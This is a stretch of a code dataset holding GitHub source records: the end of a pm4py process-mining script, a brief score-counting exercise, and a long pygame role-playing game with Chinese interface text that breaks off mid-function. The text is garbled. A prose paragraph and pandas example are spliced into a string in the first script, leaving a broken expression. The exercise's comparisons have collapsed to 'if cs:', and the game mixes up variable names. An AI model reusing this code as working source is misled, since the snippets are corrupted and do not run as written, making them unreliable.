\"TIMESTAMP_DB\": \"time:timestamp\"})\nparameters = {log_converter.Variants.TO_EVENT_LOG.value.Parameters.CASE_ID_KEY: 'case:concept:name'}\nevent_log = log_converter.apply(df_joined, parameters=parameters, variant=log_converter.Variants.TO_EVENT_LOG)\n\n# print(event_log)\n\nevent_log = interval_lifecycle.assign_lead_cycle_time(event_log)\n\n# print(\"\\nPercentile 
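Both latency columns in this record follow the same recipe: parse the timestamp columns with pd.to_datetime, subtract, and divide by pd.Timedelta(seconds=1) to get float seconds. A self-contained miniature of that join, using made-up timestamps in the same %d/%b/%Y:%H:%M:%S%z format:

import pandas as pd

web = pd.DataFrame({"TIMESTAMP_WS": ["01/Jan/2023:10:00:00+0000",
                                     "01/Jan/2023:10:00:02+0000"]})
app = pd.DataFrame({"TIMESTAMP_AS": ["01/Jan/2023:10:00:01+0000",
                                     "01/Jan/2023:10:00:05+0000"]})

web["TIMESTAMP_WS"] = pd.to_datetime(web["TIMESTAMP_WS"], format="%d/%b/%Y:%H:%M:%S%z")
app["TIMESTAMP_AS"] = pd.to_datetime(app["TIMESTAMP_AS"], format="%d/%b/%Y:%H:%M:%S%z")

joined = web.join(app)   # row-wise join on the shared index
joined["TIME_DELTA"] = (joined["TIMESTAMP_AS"] - joined["TIMESTAMP_WS"]) / pd.Timedelta(seconds=1)
print(joined["TIME_DELTA"].tolist())  # -> [1.0, 3.0]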
below the safe performance score 3 sec {}%\".format(count / ))\n\nvariants = variants_filter.get_variants(event_log)\n\n# print(variants)\n\nprint('\\nEvents: {} - Cases: {} - Variants: {}'.format(df_joined_size, len(event_log), len(variants)))\n\ndef performance_analysis(variants):\n variants_scores = {}\n count = 0\n for key, value in variants.items():\n variants_scores[key] = 0\n for event in value[0]:\n variants_scores[key] += event[\"TIME_DELTA_DB\"]\n \n performance_drop_variant = max(variants_scores, key=variants_scores.get)\n\n performance_drop_value = variants_scores[performance_drop_variant]\n\n print(\"\\n{0:.2g} is the most variant performance drop\".format(performance_drop_value))\n\n plt2 = plt.figure()\n ax1 = plt2.add_subplot(111)\n ax1.plot([x for x in range(len(variants_scores))], variants_scores.values())\n # plt.show()\n\n count = 0\n for value in variants_scores.values():\n if value < 3:\n count += 1\n\n print(\"\\nPercentile under 3 sec time delta db {:.2f}%\".format(count / len(variants_scores) * 100))\n\n # Remove the variant from the dictionary for the later comparison\n for key, value in variants_scores.items():\n if value == performance_drop_value:\n del variants_scores[key]\n break\n\n return {0: performance_drop_value, \"values\": list(variants_scores.values())}\n\nperformance_drop = performance_analysis(variants)\n\n#Filter most common variants\nfiltered_log = variants_filter.filter_log_variants_percentage(event_log, percentage=0.5)\n# print(len(filtered_log))\n\nvariants_filtered = variants_filter.get_variants(filtered_log)\n# print(len(variants_filtered))\n\nperformance_analysis(variants_filtered)\nprint()\n\n## Point 6\nfor n in range(50):\n i = randint(0, len(performance_drop[\"values\"])-1)\n z = (performance_drop[0] - performance_drop[\"values\"][i])/sqrt(performance_drop[0] + performance_drop[\"values\"][i])\n if z > 1.96:\n print(\"Comparing most performance drop variant with variant number {} differences are significantly important\".format(i+1))\n\n## Point 7\n# from pm4py.algo.discovery.dfg import algorithm as dfg_discovery\n# dfg = dfg_discovery.apply(event_log)\n\n# from pm4py.visualization.dfg import visualizer as dfg_visualization\n# dfg = dfg_discovery.apply(event_log, variant=dfg_discovery.Variants.PERFORMANCE)\n# parameters = {dfg_visualization.Variants.PERFORMANCE.value.Parameters.FORMAT: \"png\"}\n# gviz = dfg_visualization.apply(dfg, log=event_log, variant=dfg_visualization.Variants.PERFORMANCE, parameters=parameters)\n# dfg_visualization.save(gviz, \"dfg.png\")","repo_name":"Davydhh/Zucchetti-Process-Mining","sub_path":"solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":6826,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"3114482687","text":"n=int(input())\r\nscore_c = score_s = 100\r\n\r\nfor _ in range(n):\r\n c,s= map(int, input().split(' '))\r\n if cs:\r\n score_s-=c\r\n else: continue\r\n \r\n\r\nprint(score_c)\r\nprint(score_s)\r\n","repo_name":"uranusneo/2021PS","sub_path":"10103.py","file_name":"10103.py","file_ext":"py","file_size_in_byte":230,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"69805922333","text":"import pygame\nimport time\nimport sys\nimport json\nimport os\nimport re\nimport random\nBLACK = 0, 0, 0\nWHITE = 255, 255, 255\nRED = 255, 0, 0\nGREY = 128, 128, 128\nCREAM = 230, 230, 230\nYELLOW = 255, 255, 0\nsize = width, height = 1100, 800 # size of the window\nfps = 
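The point-6 loop applies z = (a - b) / sqrt(a + b), the usual statistic for comparing two Poisson counts, and flags z > 1.96 (the 5% two-sided / 2.5% one-sided threshold). The comparison in isolation:

from math import sqrt

def poisson_counts_differ(a, b, threshold=1.96):
    """True if counts a and b differ significantly at roughly the 5% level."""
    z = (a - b) / sqrt(a + b)
    return abs(z) > threshold

print(poisson_counts_differ(120, 80))  # z ~ 2.83 -> True
print(poisson_counts_differ(100, 95))  # z ~ 0.36 -> False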
300 # frames per second for game\npath = os.getcwd()\nfiles = os.listdir(path)\n\npygame.init()\nscreen = pygame.display.set_mode(size)\nfclock = pygame.time.Clock()\n\nfont = pygame.font.Font(\"ShenYunSuXinTi-2.ttf\", 32)\nfont_small = pygame.font.Font(\"ShenYunSuXinTi-2.ttf\", 20)\nicon = pygame.image.load(\"./image/icon.png\")\npygame.display.set_icon(icon)\ncharacter_images = pygame.image.load(\"./image/角色.png\")\ncharacter_image = character_images.get_rect()\ncharacter_image = character_image.move(width - 60, height - 60)\nbag_images = pygame.image.load(\"./image/背包.png\")\nbag_image = bag_images.get_rect()\nbag_image = bag_image.move(width - 120, height - 60)\nachievement_images = pygame.image.load(\"./image/成就.png\")\nachievement_image = achievement_images.get_rect()\nachievement_image = achievement_image.move(width - 180, height - 60)\nstrengthen_images = pygame.image.load(\"./image/强化.png\")\nstrengthen_image = strengthen_images.get_rect()\nstrengthen_image = strengthen_image.move(width / 2 - 90, 100)\nsale_images = pygame.image.load(\"./image/出售.png\")\nsale_image = sale_images.get_rect()\nsale_image = sale_image.move((width - 200) / 3 - 140, 100)\nenchant_images = pygame.image.load(\"./image/附魔.png\")\nenchant_image = enchant_images.get_rect()\nenchant_image = enchant_image.move((width - 200) / 1.5 + 160, 100)\nshoe_images = pygame.image.load(\"./image/鞋子.png\")\nsword_images = pygame.image.load(\"./image/剑.png\")\nhelmet_images = pygame.image.load(\"./image/头盔.png\")\nring_images = pygame.image.load(\"./image/戒指.png\")\narmor_images = pygame.image.load(\"./image/护甲.png\")\nwand_images = pygame.image.load(\"./image/法杖.png\")\nbow_images = pygame.image.load(\"./image/弓箭.png\")\ntitle_images = pygame.image.load(\"./image/称号.png\")\nbig_health_images = pygame.image.load(\"./image/大红药.png\")\nsmall_health_images = pygame.image.load(\"./image/小红药.png\")\nbig_magic_images = pygame.image.load(\"./image/大蓝药.png\")\nsmall_magic_images = pygame.image.load(\"./image/小蓝药.png\")\nbig_attack_images = pygame.image.load(\"./image/攻击药剂(大).png\")\nsmall_attack_images = pygame.image.load(\"./image/攻击药剂(小).png\")\nenchant_material_images = pygame.image.load(\"./image/附魔材料.png\")\nvocational_material_images = pygame.image.load(\"./image/职业材料.png\")\nmission_material_images = pygame.image.load(\"./image/任务材料.png\")\npygame.display.set_caption(\"无名之地\")\n\n\nclass Material:\n def __init__(self, name):\n self.name = name\n\n def create_new_material(self, attack, defence, health, magic, critical, speed, luck, num, value, type):\n self.attack = attack\n self.defence = defence\n self.health = health\n self.magic = magic\n self.critical = critical\n self.speed = speed\n self.luck = luck\n self.num = num\n self.value = value\n self.type = type\n\n\nclass Baggage:\n def __init__(self, capacity):\n self.capacity = capacity\n self.objects = []\n self.amount = 0\n\n\nclass Prop:\n def __init__(self, name):\n self.name = name\n\n def create_new_prop(self, attack, defence, health, magic, critical, speed, luck, grow_attack, grow_defence,\n grow_health, grow_magic, grow_critical, grow_speed, grow_luck, value, pos, level=1,\n exp=0, need_exp=10, enchant_time=5, is_wear=0, numb=1):\n \"\"\"numb 表示此装备的序列号\"\"\"\n \"\"\"-1 = 法杖, 1 = 剑, 0 = 弓箭, 2 = helmet, 3 = armor, 4 = shoes, 5 = ornament, 6 = title\"\"\"\n # is_wear = 0,1,2,3 0 for not wearing, 1,2,3 for character 1, 2, 3\n self.level = level\n self.exp = exp\n self.need_exp = need_exp\n self.pos = pos\n self.enchant_time = enchant_time # 剩余的附魔次数\n self.grow_attack = 
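Every icon above is positioned with the same pygame idiom: load the Surface, take its bounding Rect with get_rect(), and move() it, which returns a shifted copy rather than mutating in place. The Rect arithmetic works even without a window; the 60x60 size below is just this game's icon size:

import pygame

rect = pygame.Rect(0, 0, 60, 60)          # shape a 60x60 icon's get_rect() returns
placed = rect.move(1100 - 60, 800 - 60)   # bottom-right slot of the 1100x800 window
print(placed.topleft)                      # -> (1040, 740)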
grow_attack\n self.grow_defence = grow_defence\n self.grow_health = grow_health\n self.grow_magic = grow_magic\n self.grow_critical = grow_critical\n self.grow_speed = grow_speed\n self.grow_luck = grow_luck\n self.attack = attack\n self.defence = defence\n self.health = health\n self.magic = magic\n self.critical = critical\n self.speed = speed\n self.luck = luck\n self.is_wear = is_wear\n self.value = value\n self.numb = numb\n\n def up_level(self, exp):\n self.exp += exp\n while self.exp >= self.need_exp:\n self.value += self.need_exp//2\n self.level += 1\n self.exp = self.exp - self.need_exp\n self.need_exp *= 2\n self.attack += self.grow_attack\n self.defence += self.grow_defence\n self.health += self.grow_health\n self.magic += self.grow_magic\n self.critical += self.grow_critical\n self.speed += self.grow_speed\n self.luck += self.grow_luck\n\n\nclass Drug:\n def __init__(self, name):\n self.name = name\n\n def create_new_drug(self, attack, defence, health, speed, magic, num, value):\n self.num = num\n self.attack = attack\n self.defence = defence\n self.health = health\n self.speed = speed\n self.magic = magic\n self.value = value\n\n\nclass Character:\n def __init__(self, name):\n self.name = name\n\n def create_new_character(self, attack, defence, health, magic, critical, speed, luck, insight, grow_attack,\n grow_defence, grow_health, grow_magic, grow_critical, grow_speed, grow_luck, grow_insight,\n level=1, exp=0, need_exp=10, position=[]):\n self.level = level\n self.exp = exp\n self.need_exp = need_exp\n self.position = position\n self.grow_attack = grow_attack\n self.grow_defence = grow_defence\n self.grow_health = grow_health\n self.grow_magic = grow_magic\n self.grow_critical = grow_critical\n self.grow_speed = grow_speed\n self.grow_luck = grow_luck\n self.grow_insight = grow_insight\n self.attack = attack\n self.defence = defence\n self.health = health\n self.magic = magic\n self.critical = critical\n self.speed = speed\n self.luck = luck\n self.insight = insight\n\n def up_level(self, exp):\n self.exp += exp\n while self.exp >= self.need_exp:\n self.level += 1\n self.exp = self.exp - self.need_exp\n self.need_exp *= 2\n self.attack += self.grow_attack\n self.defence += self.grow_defence\n self.health += self.grow_health\n self.magic += self.grow_magic\n self.critical += self.grow_critical\n self.speed += self.grow_speed\n self.luck += self.grow_luck\n self.insight += self.grow_insight\n\n def character_cur_ability(self):\n \"\"\"set cur_ability\"\"\"\n self.cur_attack = self.attack\n self.cur_defence = self.defence\n self.cur_health = self.health\n self.cur_speed = self.speed\n self.cur_magic = self.magic\n self.cur_critical = self.critical\n\n\ndef load_file():\n \"\"\"存档读取\"\"\"\n if not os.path.exists('fileSave.json'):\n with open('fileSave.json', 'a') as f:\n characters = []\n drug = []\n props = []\n materials = []\n dic = {'plot': 0, 'money': 0, 'characters': characters, 'drug': drug, 'props': props, 'materials': materials}\n dic = json.dumps(dic, indent=4, ensure_ascii=False)\n f.write(dic)\n with open('fileSave.json', 'r', encoding='utf-8') as file_object:\n contents = json.load(file_object)\n return contents\n\n\ndef down_file(contents):\n \"\"\"保存存档\"\"\"\n contents = json.dumps(contents, indent=4, ensure_ascii=False)\n with open('fileSave.json', 'w', encoding='utf-8') as file_object:\n \"\"\"覆盖原存档\"\"\"\n file_object.write(contents)\n\n\ndef make_lists(contents, props_list, drug_list, characters_list, materials_list):\n \"\"\"存档变列表\"\"\"\n for j in 
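Both up_level methods share one loop: bank the gained exp, and while it covers need_exp, consume it, bump the level, and double the requirement, so level costs grow geometrically (10, 20, 40, ...). The loop in isolation:

def up_level(level, exp, need_exp, gained):
    exp += gained
    while exp >= need_exp:
        exp -= need_exp
        need_exp *= 2        # each level costs twice the previous one
        level += 1
    return level, exp, need_exp

print(up_level(1, 0, 10, 35))  # -> (3, 5, 40): 10 then 20 consumed, 5 left over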
contents['characters']:\n ch = Character(j['name'])\n ch_prop = []\n for i in j['position']:\n prop = Prop(i['name'])\n prop.create_new_prop(i['attack'], i['defence'], i['health'], i['magic'], i['critical'], i['speed'],\n i['luck'],\n i['grow_attack'], i['grow_defence'], i['grow_health'], i['grow_magic'],\n i['grow_critical'],\n i['grow_speed'], i['grow_luck'], i['value'], i['pos'], i['level'], i['exp'],\n i['need_exp'], i['enchant_time'], i['is_wear'], i['numb'])\n ch_prop.append(prop)\n ch.create_new_character(j['attack'], j['defence'], j['health'], j['magic'], j['critical'], j['speed'],\n j['luck'], j['insight'], j['grow_attack'], j['grow_defence'], j['grow_health'],\n j['grow_magic'], j['grow_critical'], j['grow_speed'], j['grow_luck'], j['grow_insight'],\n j['level'], j['exp'], j['need_exp'], ch_prop)\n characters_list.append(ch)\n for i in contents['props']:\n prop = Prop(i['name'])\n prop.create_new_prop(i['attack'], i['defence'], i['health'], i['magic'], i['critical'], i['speed'], i['luck'],\n i['grow_attack'], i['grow_defence'], i['grow_health'], i['grow_magic'], i['grow_critical'],\n i['grow_speed'], i['grow_luck'], i['value'], i['pos'], i['level'], i['exp'],\n i['need_exp'], i['enchant_time'], i['is_wear'], i['numb'])\n props_list.append(prop)\n for i in contents['drug']:\n drug = Drug(i['name'])\n drug.create_new_drug(i['attack'], i['defence'], i['health'], i['speed'], i['magic'], i['num'], i['value'])\n drug_list.append(drug)\n for i in contents['materials']:\n material = Material(i['name'])\n material.create_new_material(i['attack'], i['defence'], i['health'], i['magic'], i['critical'], i['speed'],\n i['luck'], i['num'], i['value'], i['type'])\n materials_list.append(material)\n\n\ndef show_lines(lines, t):\n for i in range(len(lines)):\n texts = font.render(lines[i], True, BLACK)\n text = texts.get_rect()\n text.center = (width/2, 100 + i*200)\n screen.blit(texts, text)\n pygame.display.update() # watch out its position\n time.sleep(t)\n\n\ndef show_words(words, coord, font, color):\n texts = font.render(words, True, color)\n text = texts.get_rect()\n text.center = (coord[0], coord[1])\n screen.blit(texts, text)\n\n\ndef show_attr(character, coord):\n show_words('经验:' + str(character.exp) + '/' + str(character.need_exp), (coord[0] + 72, coord[1]), font, BLACK)\n show_words('攻击:' + str(character.attack), (coord[0], coord[1] + 50), font, BLACK)\n show_words('防御:' + str(character.defence), (coord[0] + 145, coord[1] + 50), font, BLACK)\n show_words('生命:' + str(character.health), (coord[0], coord[1] + 100), font, BLACK)\n show_words('魔法:' + str(character.magic), (coord[0] + 145, coord[1] + 100), font, BLACK)\n show_words('暴击:' + str(character.critical), (coord[0], coord[1] + 150), font, BLACK)\n show_words('速度:' + str(character.speed), (coord[0] + 145, coord[1] + 150), font, BLACK)\n show_words('幸运:' + str(character.luck), (coord[0], coord[1] + 200), font, BLACK)\n show_words('洞视:' + str(character.insight), (coord[0] + 145, coord[1] + 200), font, BLACK)\n show_words('等级:' + str(character.level), (coord[0], coord[1] + 250), font, BLACK)\n\n\ndef refresh_lists(baggage, props_list, drug_list, materials_list):\n \"\"\"背包存入列表\"\"\"\n props_list.clear()\n drug_list.clear()\n materials_list.clear()\n for i in baggage.objects:\n if Prop == type(i):\n props_list.append(i)\n elif Drug == type(i):\n drug_list.append(i)\n elif Material == type(i):\n materials_list.append(i)\n\n\ndef refresh_content(contents, characters_list, props_list, drug_list, materials_list):\n \"\"\"列表变存档\"\"\"\n 
contents['characters'].clear()\n contents['drug'].clear()\n contents['props'].clear()\n contents['materials'].clear()\n for i in characters_list:\n dic = {'name': i.name, 'attack': i.attack, 'defence': i.defence, 'health': i.health,\n 'magic': i.magic, 'critical': i.critical, 'speed': i.speed, 'luck': i.luck,\n 'insight': i.insight, 'level': i.level, 'exp': i.exp, 'need_exp': i.need_exp,\n 'grow_attack': i.grow_attack, 'grow_defence': i.grow_defence, 'grow_health': i.grow_health,\n 'grow_magic': i.grow_magic, 'grow_critical': i.grow_critical, 'grow_speed': i.grow_speed,\n 'grow_luck': i.grow_luck, 'grow_insight': i.grow_insight, 'position': i.position}\n prop_dic = []\n for j in dic['position']:\n prop = {'name': j.name, 'attack': j.attack, 'defence': j.defence, 'health': j.health, 'magic': j.magic,\n 'critical': j.critical, 'speed': j.speed, 'luck': j.luck, 'level': j.level,'exp': j.exp,\n 'need_exp': j.need_exp, 'grow_attack': j.grow_attack, 'grow_defence': j.grow_defence,\n 'grow_health': j.grow_health, 'grow_magic': j.grow_magic, 'grow_critical': j.grow_critical,\n 'grow_speed': j.grow_speed, 'grow_luck': j.grow_luck, 'pos': j.pos, 'value': j.value,\n 'is_wear': j.is_wear, 'enchant_time': j.enchant_time, 'numb': j.numb}\n prop_dic.append(prop)\n dic['position'] = prop_dic\n content['characters'].append(dic)\n for i in drug_list:\n dic = {'name': i.name, 'attack': i.attack, 'defence': i.defence, 'health': i.health,\n 'magic': i.magic, 'speed': i.speed, 'value': i.value, 'num': i.num}\n content['drug'].append(dic)\n for i in props_list:\n dic = {'name': i.name, 'attack': i.attack, 'defence': i.defence, 'health': i.health,\n 'magic': i.magic, 'critical': i.critical, 'speed': i.speed, 'luck': i.luck, 'level': i.level,\n 'exp': i.exp, 'need_exp': i.need_exp, 'grow_attack': i.grow_attack, 'grow_defence': i.grow_defence,\n 'grow_health': i.grow_health, 'grow_magic': i.grow_magic, 'grow_critical': i.grow_critical,\n 'grow_speed': i.grow_speed, 'grow_luck': i.grow_luck, 'pos': i.pos, 'value': i.value,\n 'is_wear': i.is_wear, 'enchant_time': i.enchant_time, 'numb': i.numb}\n content['props'].append(dic)\n for i in materials_list:\n dic = {'name': i.name, 'attack': i.attack, 'defence': i.defence, 'health': i.health, 'critical': i.critical,\n 'magic': i.magic, 'speed': i.speed, 'value': i.value, 'num': i.num, 'luck': i.luck, 'type': i.type}\n content['materials'].append(dic)\n\n\ndef add_prop_character(character, prop, num):\n \"\"\"人物装备道具\"\"\"\n character.attack += prop.attack\n character.defence += prop.defence\n character.health += prop.health\n character.magic += prop.magic\n character.critical += prop.critical\n character.luck += prop.luck\n character.speed += prop.speed\n for i in character.position:\n if prop.pos <= 1:\n if i.pos <= 1:\n remove_prop_character(character, i)\n break\n else:\n if i.pos == prop.pos:\n remove_prop_character(character, i)\n break\n if prop.is_wear != 0:\n remove_prop_character(character_list[prop.is_wear-1], prop)\n character.position.append(prop)\n prop.is_wear = num\n for i in prop_list:\n if i.name == prop.name and i.numb == prop.numb:\n i.is_wear = prop.is_wear\n for i in character_list:\n if i.name == character.name:\n i.position = character.position\n refresh_baggage(baggage, prop_list, drug_list, material_list)\n\n\ndef remove_prop_character(character, prop):\n \"\"\"移除装备\"\"\"\n for i in character.position:\n if i.name == prop.name:\n character.position.remove(i)\n prop.is_wear = 0\n for i in character_list:\n if i.name == character.name:\n i.position = 
character.position\n refresh_baggage(baggage, prop_list, drug_list, material_list)\n for i in prop_list:\n if i.name == prop.name and i.numb == prop.numb:\n i.is_wear = 0\n character.attack -= prop.attack\n character.defence -= prop.defence\n character.health -= prop.health\n character.magic -= prop.magic\n character.critical -= prop.critical\n character.luck -= prop.luck\n character.speed -= prop.speed\n\n\ndef strengthen_prop(prop):\n \"\"\"强化装备\"\"\"\n level = prop.level\n chance = 100 - ((level - 1) * 10)\n if level == 10:\n return 2 # 2 for out of range\n if content['money'] < baggage.objects[chose_num].need_exp:\n return 3 # 3 for lack of money\n content['money'] -= baggage.objects[chose_num].need_exp\n rand = random.randint(1, 100)\n if rand <= chance:\n prop.up_level(prop.need_exp)\n if prop.is_wear != 0:\n for i in character_list[prop.is_wear - 1].position:\n if i.name == prop.name and i.numb == prop.numb:\n i.attack = prop.attack\n i.defence = prop.defence\n i.health = prop.health\n i.magic = prop.magic\n i.critical = prop.critical\n i.speed = prop.speed\n i.luck = prop.luck\n i.value = prop.value\n i.level = prop.level\n i.need_exp = prop.need_exp\n i.exp = prop.exp\n for i in prop_list:\n if i.name == prop.name and i.numb == prop.numb:\n i.attack = prop.attack\n i.defence = prop.defence\n i.health = prop.health\n i.magic = prop.magic\n i.critical = prop.critical\n i.speed = prop.speed\n i.luck = prop.luck\n i.value = prop.value\n i.level = prop.level\n i.need_exp = prop.need_exp\n i.exp = prop.exp\n refresh_baggage(baggage, prop_list, drug_list, material_list)\n return 1 # 1 for success\n else:\n return 0 # 0 for fail\n\n\ndef enchant_prop(prop, material):\n for i in prop_list:\n if i.name == prop.name and i.numb == prop.numb:\n i.enchant_time -= 1\n i.attack += material.attack\n i.defence += material.defence\n i.health += material.health\n i.magic += material.magic\n i.critical += material.critical\n i.speed += material.speed\n i.luck += material.luck\n i.value += material.value // 2\n if prop.is_wear != 0:\n for i in character_list[prop.is_wear - 1].position:\n if i.name == prop.name and i.numb == prop.numb:\n i.enchant_time = prop.enchant_time\n i.attack = prop.attack\n i.defence = prop.defence\n i.health = prop.health\n i.magic = prop.magic\n i.critical = prop.critical\n i.speed = prop.speed\n i.luck = prop.luck\n i.value = prop.value\n refresh_baggage(baggage, prop_list, drug_list, material_list)\n\n\ndef is_new(contents):\n new = contents[\"plot\"]\n plot_1 = [\"一觉醒来,你不知道自己身处何处,\", \"甚至自己是何许人也亦无从得知,世界犹如混沌般恍惚。\", \"徘徊于这谜一般的大陆上,你决定只身探索,寻找真相......\"]\n if new == 0:\n contents[\"plot\"] = 1\n \"\"\"测试为0,实际为1\"\"\"\n screen.fill(CREAM)\n show_lines(plot_1, 2)\n pygame.display.update()\n fclock.tick(fps)\n down_file(contents)\n\n\ndef draw_window():\n pygame.draw.rect(screen, BLACK, (100, 50, width - 200, height - 200), 4)\n \"\"\"rect stand for (x,y,width,height)\"\"\"\n pygame.draw.rect(screen, BLACK, (width - 130, 50, 30, 30), 4)\n pygame.draw.line(screen, RED, (width - 125, 55), (width - 105, 75), 4)\n pygame.draw.line(screen, RED, (width - 105, 55), (width - 125, 75), 4)\n pygame.display.update()\n fclock.tick(fps)\n\n\ndef close_window():\n mouse_pos = pygame.mouse.get_pos()\n mouse_pressed = pygame.mouse.get_pressed()\n for event in pygame.event.get(): # magic move\n if event.type == pygame.QUIT: # close the window\n content['baggage'] = baggage.amount # put into fileSave\n refresh_content(content, character_list, prop_list, drug_list, material_list)\n 
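            # Flush the in-memory lists back into the save dict and write it
            # to disk before exiting, so quitting from a sub-window never loses progress.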
down_file(content)\n sys.exit()\n if width - 130 < mouse_pos[0] < width - 100 and 50 < mouse_pos[1] < 80 and mouse_pressed[0] == 1:\n return 1\n\n\ndef show_image(item_list_image, coord, id, num):\n dic = {'-1': wand_images, '0': bow_images, '1': sword_images, '2': helmet_images, '3': armor_images,\n '4': shoe_images, '5': ring_images, '6': title_images, '大红药': big_health_images,\n '小红药': small_health_images, '大蓝药': big_magic_images, '小蓝药': small_magic_images,\n '小攻击药': small_attack_images, '大攻击药': big_attack_images, '附魔材料': enchant_material_images,\n '职业材料': vocational_material_images, '任务材料': mission_material_images}\n item_list_image.append(dic[id].get_rect())\n item_list_image[num] = item_list_image[num].move(coord)\n screen.blit(dic[id], item_list_image[num])\n return item_list_image\n\n\ndef show_object(baggage):\n item_list_image = []\n j = 0\n for i in baggage.objects:\n coord = j % 6 * 150 + 150, j // 6 * 150 + 70\n if type(i) == Prop:\n item_list_image = show_image(item_list_image, coord, str(i.pos), j)\n if i.is_wear > 0:\n pygame.draw.line(screen, RED, (j % 6 * 150 + 115, j // 6 * 150 + 65), (j % 6 * 150 + 125, j // 6 * 150\n + 75), 4)\n pygame.draw.line(screen, RED, (j % 6 * 150 + 125, j // 6 * 150 + 75), (j % 6 * 150 + 145, j // 6 * 150\n + 55), 4)\n show_words(str(character_list[i.is_wear - 1].name),\n (j % 6 * 150 + 190, j // 6 * 150 + 60), font_small, GREY)\n elif type(i) == Drug:\n item_list_image = show_image(item_list_image, coord, str(i.name), j)\n elif type(i) == Material:\n '''change into upper form'''\n item_list_image = show_image(item_list_image, coord, str(i.type), j)\n show_words(i.name, (j % 6 * 150 + 180, j // 6 * 150 + 150), font, BLACK)\n j += 1\n return len(item_list_image)\n\n\ndef click_on_props():\n mouse_pos = pygame.mouse.get_pos()\n for i in range(4):\n if 100 < mouse_pos[0] < width - 100 and 50 + i * 150 < mouse_pos[1] < 200 + i * 150:\n for j in range(6):\n if 100 + j * 150 < mouse_pos[0] < 250 + j * 150:\n return i * 6 + j\n return -1\n\n\ndef translate(word):\n translator = {'name': '名称', 'attack': '攻击', 'defence': '防御', 'health': '生命', 'magic': '魔法', 'critical': '暴击',\n 'speed': '速度', 'luck': '幸运', 'level': '等级', 'num': '数量', 'enchant_time': '可附魔次数',\n 'value': '价格', 'type': '类型'}\n return translator[word]\n\n\ndef sale_obj(baggage, obj, contents):\n \"\"\"卖出物品\"\"\"\n contents['money'] += obj.value\n if Prop == type(obj):\n baggage.objects.remove(obj)\n else:\n for i in baggage.objects:\n if i.name == obj.name:\n i.num -= 1\n if i.num <= 0:\n baggage.objects.remove(i)\n baggage.amount -= 1\n break\n\n\ndef draw_character():\n pygame.draw.line(screen, GREY, (100, height / 2 - 50), (width - 100, height / 2 - 50), 4)\n pygame.draw.line(screen, BLACK, ((width - 200) / 3 + 100, 50), ((width - 200) / 3 + 100, height - 150), 4)\n pygame.draw.line(screen, BLACK, ((width - 200) / 1.5 + 105, 50), ((width - 200) / 1.5 + 105, height - 150), 4)\n show_words(character_list[0].name, ((width - 200) / 6 + 100, 100), font, BLACK)\n show_words(character_list[1].name, ((width - 200) / 2 + 100, 100), font, BLACK)\n show_words(character_list[2].name, ((width - 200) / 6 * 5 + 100, 100), font, BLACK)\n show_attr(character_list[0], ((width - 200) / 6 + 20, height / 2 - 20))\n show_attr(character_list[1], ((width - 200) / 2 + 20, height / 2 - 20))\n show_attr(character_list[2], ((width - 200) / 6 * 5 + 20, height / 2 - 20))\n for i in range(6):\n pygame.draw.rect(screen, GREY, (((width - 200) / 6 - 40 + 97 * (i % 3), 240 if i > 2 else 130), (85, 85)), 4)\n 
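        # Together with the rect above, the three calls in this loop draw the
        # same 2 x 3 grid of 85 x 85 equipment slots under each of the three
        # character columns; only the x offset changes per column.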
pygame.draw.rect(screen, GREY, (((width - 200) / 2 - 35 + 97 * (i % 3), 240 if i > 2 else 130), (85, 85)), 4)\n        pygame.draw.rect(screen, GREY, (((width - 200) / 6 * 5 - 35 + 97 * (i % 3),\n                                        240 if i > 2 else 130), (85, 85)), 4)\n    item_list_image = []\n    k = 0\n    for i in range(3):\n        for j in range(6):\n            if j < len(character_list[i].position):\n                coord = (width - 200) / 6 - 25 + 97 * (j % 3) + 308 * i - (i // 2) * 8, 250 if j > 2 else 140\n                item_list_image = show_image(item_list_image, coord, str(character_list[i].position[j].pos), k)\n                show_words(str(character_list[i].position[j].name),\n                           ((width - 200) / 6 + 97 * (j % 3) + i * 300, 340 if j > 2 else 230),\n                           font_small, RED)\n                k += 1\n    draw_window()\n\n\ndef draw_map():\n    for point in point_list:\n        pygame.draw.circle(screen, YELLOW, point, 15, 4)\n\n\ndef level_choose():\n    i = 0\n    for point in point_list:\n        if point[0] - 25 < map_choice[0] < point[0] + 25 and point[1] - 25 < map_choice[1] < point[1] + 25:\n            pygame.draw.circle(screen, RED, point, 15, 4)\n            return i\n        i += 1\n    return -1\n\n\ndef refresh_baggage(baggage, props_list, drug_list, materials_list):\n    \"\"\"Load the item lists back into the baggage.\"\"\"\n    baggage.objects = props_list[:] + drug_list[:] + materials_list[:]\n    baggage.amount = len(baggage.objects)\n\n\ndef get_cur_ability(fight_event):\n    \"\"\"Initialise the combatants and enemies for a fight event.\"\"\"\n    with open('fileSave.json', 'r', encoding='utf-8') as file_object:\n        contents = json.load(file_object)\n    for j in contents['fight_event']:\n        if j['num'] == fight_event:\n            for i in j['enemy']:\n                ch = Character(i['name'])\n                ch.create_new_character(i['attack'], i['defence'], i['health'], i['magic'], i['critical'], i['speed'],\n                                        i['luck'], 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, [])\n                enemy_list.append(ch)\n    for i in characters_fight_list:\n        i.character_cur_ability()\n    for i in enemy_list:\n        i.character_cur_ability()\n\n\ndef judge_speed():\n    \"\"\"Sort all living combatants by speed, fastest first.\"\"\"\n    speed_list = []\n    for i in characters_fight_list:\n        if i.cur_health > 0:\n            speed_list.append(i)\n    for i in enemy_list:\n        if i.cur_health > 0:\n            speed_list.append(i)\n    for i in range(0, len(speed_list)-1):\n        for j in range(i+1, len(speed_list)):\n            if speed_list[i].cur_speed < speed_list[j].cur_speed:\n                speed_list[i], speed_list[j] = speed_list[j], speed_list[i]\n    return speed_list\n\n\ndef character_action(character1, character2):\n    harm = round(0.8 * character1.cur_attack - character2.cur_defence) + round(0.2 * character1.cur_attack)\\\n        if character1.cur_attack > character2.cur_defence else round(0.2 * character1.cur_attack)\n    if character1.cur_critical >= random.randint(1, 100):\n        print(\"Critical hit!!!\")\n        harm = round(character1.cur_attack * 1.5) - character2.cur_defence\n    if harm <= 0:\n        harm = 0\n    character2.cur_health -= harm\n    print(character1.name + ' dealt ' + str(harm) + ' damage to ' + character2.name + '.')\n\n\ndef character_die(character, lst):\n    lst.remove(character)\n\n\ndef fight_end():\n    return len(characters_fight_list) == 0 or len(enemy_list) == 0\n\n\ndef fight_fight():\n    \"\"\"Simulated battle: the main combat 